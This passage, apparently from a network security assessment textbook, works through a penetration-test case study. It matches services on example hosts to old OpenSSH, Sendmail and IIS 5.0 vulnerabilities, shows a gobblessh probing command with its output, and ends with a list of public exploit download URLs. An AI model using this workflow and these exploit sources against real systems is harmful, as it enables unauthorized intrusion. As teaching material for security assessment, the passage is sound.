After performing full TCP and UDP port scanning, along with initial investigation of accessible network services to qualify nmap results and obtain further useful information, you usually know enough to properly investigate known vulnerabilities.
Sites such as MITRE CVE, SecurityFocus, ISS X-Force, and Packet Storm provide bug details, along with publicly accessible exploit scripts. To fully qualify vulnerabilities by hand, you often need to use such tools. What follows is a breakdown of the results I obtained from these sites in relation to the accessible network services I identified in this case study.
Telnet, NTP, and SNMP services are accessible on the Cisco IOS 12.2.8 router at 192.168.10.1. Through checking MITRE CVE, SecurityFocus, and ISS X-Force, no remotely exploitable issues were identified that affect this version of IOS.
Therefore, the two particular threats to this Cisco IOS router are from:
Telnet service password grinding
SNMP service community string grinding
OpenSSH 3.1p1 and Sendmail 8.11.6 were found running on the Solaris 8 mail server at 192.168.10.10. Table 14-3 shows the remotely exploitable issues identified through checking MITRE CVE, SecurityFocus, and ISS X-Force databases for issues relating to OpenSSH 3.1p1.
CVE |
BID |
XFID |
Notes |
---|---|---|---|
CVE-2002-0639 |
5093 |
9169 |
OpenSSH 3.3 and prior contains vulnerabilities in challenge-response handling code. |
CVE-2003-0190 |
7467 |
11902 |
OpenSSH 3.6.1p1 and earlier, with PAM support enabled, allows remote attackers to determine valid usernames via a timing attack. |
CVE-2003-0682 |
N/A |
13214 |
"Memory bugs" in OpenSSH 3.7.1 and prior. |
CVE-2003-0693 |
8628 |
13191 |
OpenSSH 3.7.1 and prior contains buffer management errors, resulting in denial of service or arbitrary code being executed. |
CVE-2003-0695 |
N/A |
13215 |
OpenSSH 3.7.1 and prior contains further buffer management errors. |
From investigating CVE-2002-0639 in more detail, I find that OpenSSH is only exploitable if SKEY or BSD_AUTH authentication methods are supported (default under OpenBSD 3.x). Two public exploits for this issue under OpenBSD have been released: although they don't remotely exploit Solaris hosts, they are available from:[1]
[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools.
Example 14-16 shows how to use the gobblessh patched OpenSSH client (from sshutup-theo.tar.gz, as discussed in Chapter 4) check to see if the remote host supports SKEY or BSD_AUTH authentication mechanisms.
# ./gobblessh -l root 192.168.10.10 -M skey [*] remote host supports ssh2 [*] server_user: root:skey [*] keyboard-interactive method available [x] bsdauth (skey) not available Permission denied (publickey,password,keyboard-interactive). # ./gobblessh -l root 192.168.10.10 -M bsdauth -S invalid [*] remote host supports ssh2 [*] server_user: root:invalid [*] keyboard-interactive method available [x] bsdauth (invalid) not available Permission denied (publickey,password,keyboard-interactive).
In this case, both SKEY and BSD_AUTH authentication mechanisms aren't supported, and so the CVE-2002-0639 challenge-response exploit won't be effective.
CVE-2003-0190, on the other hand, relies on a timing bug in OpenSSH related to the PAM authentication mechanism. By searching Packet Storm and SecurityFocus for exploit scripts and tools, I find a useful tool, available at:
The recent memory bugs and buffer management issues identified in OpenSSH (CVE-2003-0682, CVE-2003-0693, and CVE-2003-0695) have no publicly available remote exploit scripts. Due to the way that these bugs are nested and rely on a number of variables for successful remote exploitation, it is unlikely that reliable exploits will be made publicly available.
Table 14-4 shows the remotely exploitable issues identified through checking MITRE CVE, SecurityFocus, and ISS X-Force databases for issues relating to Sendmail 8.11.6.
CVE |
BID |
XFID |
Notes |
---|---|---|---|
CVE-2002-1337 |
6991 |
10748 |
A buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, as processed by the crackaddr( ) function of headers.c. |
CVE-2003-0161 |
7230 |
11653 |
The prescan( ) function in Sendmail before 8.12.9 doesn't properly handle certain conversions from char and int types, causing denial of service or possible execution of arbitrary code. |
CVE-2003-0694 |
8641 |
13204 |
The prescan( ) function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code. |
The LSD security research team (http://www.lsd-pl.net) posted an excellent technical analysis and discussion of the CVE-2002-1337 crackaddr( ) bug. To remotely exploit the Sendmail service, useful data must exist after the static buffer in which the overflow occurs, resulting in the execution path being disrupted (commonly resulting in a crash).
LSD found that on most Unix platforms, the static buffer isn't followed by such useful data. Their post to the BugTraq mailing list in March 2003 contained the low-level technical details, archived at http://www.securityfocus.com/archive/1/313757. In particular, they found that Solaris 8 running Sendmail 8.11.6 doesn't crash when provided with the malformed email address, and isn't, therefore, remotely exploitable.
At the time of writing, there are also no public tools or scripts to exploit the recent Sendmail 8.12.9 prescan( ) bugs (CVE-2003-0161 and CVE-2003-0694).
The two accessible ports on the Windows 2000 server at 192.168.10.25 are both IIS 5.0 web service instances. By enumerating the enabled IIS subsystems and components, you can look through MITRE CVE and other vulnerability lists in an efficient manner. Table 14-5 shows a list of known remotely exploitable security issues relating to this IIS server, as derived from MITRE CVE, SecurityFocus, and Microsoft security bulletin databases.
CVE |
BID |
Microsoft |
Notes |
---|---|---|---|
CVE-2000-0884 |
1806 |
MS00-078 |
Unicode vulnerability allows remote attackers to read files outside the web root and possibly execute commands |
CVE-2001-0241 |
2674 |
MS01-023 |
Remote msw3prt.dll ISAPI extension overflow through crafted requests to.printer files |
CVE-2001-0333 |
2708 |
MS01-026 |
IIS superfluous decodes vulnerability, very similar to Unicode, by double-encoding characters to traverse out of directories and possibly execute commands |
CVE-2001-0500 |
2880 |
MS01-033 |
Remote idq.dll ISAPI extension overflow through requests for .ida and .idq files |
CVE-2002-0079 |
4485 |
MS02-018 |
ASP chunked encoding overflow |
CVE-2002-0147 |
4490 |
MS02-018 |
ASP chunked encoding overflow variant |
CVE-2003-0109 |
7116 |
MS03-007 |
Remote ntdll.dll overflow through IIS 5.0 exploitable through WebDAV HTTP methods (such as SEARCH and PROPFIND) |
After assembling a list of serious remotely exploitable vulnerabilities, visit Packet Storm, SecurityFocus, and underground web sites to assemble a toolkit. You can find the exploits at the following URLs.
http://packetstormsecurity.org/0101-exploits/unitools.tgz
http://www.xfocus.org/exploits/200110/iissystem.zip
http://www.securityfocus.com/bid/1806/exploit/
http://packetstormsecurity.org/0105-exploits/jill.c
http://packetstormsecurity.org/0111-exploits/IIS5-Koei.zip
http://www.securityfocus.com/bid/2674/exploit/
http://packetstormsecurity.org/0107-exploits/ida-exploit.sh
http://www.securityfocus.com/bid/2880/exploit/
http://www.securityfocus.com/data/vulnerabilities/exploits/DDK-IIS.c
http://www.securiteam.com/exploits/5YP011575W.html
http://www.securityfocus.com/bid/4485/exploit/
http://packetstormsecurity.org/0303-exploits/rs_iis.c
http://www.securityfocus.com/data/vulnerabilities/exploits/KaHT_public.tar.gz
http://www.securiteam.com/exploits/5RP030KAAY.html
http://www.securityfocus.com/bid/7116/exploit/